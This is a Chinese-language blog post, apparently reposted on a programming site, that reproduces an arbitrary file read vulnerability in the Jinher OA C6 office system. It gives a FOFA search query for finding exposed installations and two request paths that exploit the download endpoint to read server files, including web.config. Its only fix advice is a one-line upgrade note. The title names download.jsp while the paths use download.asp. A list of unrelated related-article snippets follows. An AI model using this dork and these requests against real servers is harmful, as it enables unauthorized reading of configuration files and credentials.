【漏洞复现】金和OA C6 download.jsp 任意文件读取漏洞

免责声明:

        本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。

产品简介

        金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断的更新完善,全面支撑企业发展

漏洞描述

        金和OA C6 download.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息

网络空间测绘

Fofa

app="Jinher-OA"

image.png

漏洞复现

读取 download.asp

/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=download.asp

image.png
读取 web.config

/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config

image.png

修复建议

1、升级产品到最新版本

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/29882.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

AI写作与个人写作:思考性的探究

在人工智能(AI)技术日益成熟的今天,AI写作已经成为现实,例如文心一言、kimi、研导AI写作等工具。然而,当机器开始涉足写作这一传统上被认为是人类独有的创造性活动时,我们不禁要问:AI写作是否能…

AI数据分析:Excel表格智能判断数据起点来计算增长率

工作任务:计算Excel表格中2023年1月到2024年4月的总增长率和复合增长率。 如果数据都有的情况下,公式很简单: 总增长率 (O2-B2)/B2 复合增长率 POWER((O2/B2),1/13)-1 但是,2023年1月、2月、3月的数据,有些有&…

AI办公自动化:用通义千问批量翻译长篇英语TXT文档

在deepseek中输入提示词: 你是一个Python编程专家,现在要完成一个编写基于qwen-turbo模型API和dashscope库的程序脚本,具体步骤如下: 打开文件夹:F:\AI自媒体内容\待翻译; 获取里面所有TXT文档&#xff…

Vue3搭载后端服务器开发文档

1 第8章 “微商城”后端服务器搭建 “微商城”后端服务器基于 ThinkJS MySQL ,以下是环境搭建文档。 8.1 搭建 MySQL 环境 8.1.1 安装 MySQL 本项目基于 MySQL 5.7 社区版,如果您还没有安装,请继续阅读安装步骤。如果您 已经安…

mac如何检测硬盘损坏 常用mac硬盘检测坏道工具推荐

mac有时候也出现一些问题,比如硬盘损坏。硬盘损坏会导致数据丢失、系统崩溃、性能下降等严重的后果,所以及时检测和修复硬盘损坏是非常必要的。那么,mac如何检测硬盘损坏呢?有哪些常用的mac硬盘检测坏道工具呢? 一、m…

Python 数据可视化 散点图

Python 数据可视化 散点图 import matplotlib.pyplot as plt import numpy as npdef plot_scatter(ref_info_dict, test_info_dict):# 绘制散点图,ref横,test纵plt.figure(figsize(80, 48))n 0# scatter_header_list [peak_insert_size, median_insert…

nginx反向代理动静分离和负载均衡

一.nginx 反向代理简要介绍 1.什么是反向代理 反向代理是一种服务器,在这种设置中,代理服务器接收客户端的请求,并将这些请求转发给一个或多个后端服务器(例如应用服务器、数据库服务器等)。然后,后端服务…

【车载开发系列】IIC总线协议基础篇

【车载开发系列】IIC总线协议基础篇 【车载开发系列】IIC总线协议基础篇 【车载开发系列】IIC总线协议基础篇一. 什么是I2C二. I2C使用场景三. I2C的特点四. 传输速度四种模式五. IIC基本通讯规则1)起始信号S2)停止信号P3)发送数据&#xff…

【LinkedList与链表】

目录 1,ArrayList的缺陷 2,链表 2.1 链表的概念及结构 2.2 链表的实现 2.2.1 无头单向非循环链表实现 3,LinkedList的模拟实现 3.1 无头双向链表实现 4,LinkedList的使用 4.1 什么是LinkedList 4.2 LinkedList的使用 5…

第4天:用户认证系统实现

第4天:用户认证系统实现 目标 实现用户认证系统,包括用户注册、登录、登出和密码管理。 任务概览 使用Django内置的用户认证系统。创建用户注册和登录表单。实现用户登出和密码重置功能。 详细步骤 1. 使用Django内置的用户认证系统 Django提供了…

上位机图像处理和嵌入式模块部署(h750 mcu和ad/da电路)

【 声明:版权所有,欢迎转载,请勿用于商业用途。 联系信箱:feixiaoxing 163.com】 大部分同学学习mcu的时候,都会把重点放在232、485、can、usb、eth这些常规的通信接口上面。还有一部分同学,可能会对lcd、c…

【Java基础5】JDK、JRE和JVM的区别与联系

JDK、JRE和JVM的区别与联系 Java是一种广泛使用的编程语言,它的跨平台特性得益于Java虚拟机(JVM)。然而,在Java的世界里,JDK、JRE和JVM这三个术语常常让人感到困惑。本文将阐述它们各自的功能,以及它们是如…

【設計モードの特性に基づく動的ルーティングマッピングモード】

ASP.NET Coreでは、HTTP要求を対応するコントローラ操作にマッピングするためのルーティングはコア機能の1つです。「ルーティング駆動設計モデル」は私が作りあげたばかりの設計モデル名ですが、ASPに基づくことができます。NET Coreのルーティング特性は、ルーティングを中心…

Codeforces Round 953 (Div. 2 ABCDEF题) 视频讲解

A. Alice and Books Problem Statement Alice has n n n books. The 1 1 1-st book contains a 1 a_1 a1​ pages, the 2 2 2-nd book contains a 2 a_2 a2​ pages, … \ldots …, the n n n-th book contains a n a_n an​ pages. Alice does the following: She …

【HTML01】HTML基础-基本元素-附带案例-作业

文章目录 HTML 概述学HTML到底学什么HTML的基本结构HTML的注释的作用html的语法HTML的常用标签:相关单词参考资料 HTML 概述 英文全称:Hyper Text Markup Language 中文:超文本标记语言,就将常用的50多个标记嵌入在纯文本中&…

spark常见面试题

文章目录 1.Spark 的运行流程?2.Spark 中的 RDD 机制理解吗?3.RDD 的宽窄依赖4.DAG 中为什么要划分 Stage?5.Spark 程序执行,有时候默认为什么会产生很多 task,怎么修改默认 task 执行个数?6.RDD 中 reduce…

从0到1上线小程序的步骤

文章目录 一、开发前的准备二、开发中三、开发完成的上线部署相关资料和网址 开发一个小程序(例如微信小程序)涉及到多个阶段,每个阶段都有特定的步骤和要求。以下是详细的步骤及相关资料和网址,帮助你在开发前、开发中和开发完成…

镜像源问题:pip,npm,git,Linux,docker

镜像源的作用 提高下载速度:镜像源通常位于全球不同的地理位置,用户可以选择离自己最近的镜像源下载软件或更新,从而大大提高下载速度和效率。 负载均衡:通过将下载请求分散到多个镜像源,可以减轻主服务器的负载&…

RabbitMQ 入门

目录 一:什么是MQ 二:安装RabbitMQ 三:在Java中如何实现MQ的使用 RabbitMQ的五种消息模型 1.基本消息队列(BasicQueue) 2.工作消息队列(WorkQueue) 3. 发布订阅(Publish、S…

RIP、OSPF、IS-IS学习

文章目录 RIP (Routing Information Protocol) 路由信息协议OSPF (Open Shortest Path First) 开放最短路径优先IS-IS (Intermediate System to Intermediate System) 中间系统到中间系统 RIP (Routing Information Protocol) 路由信息协议 特性: 基于距离向量&am…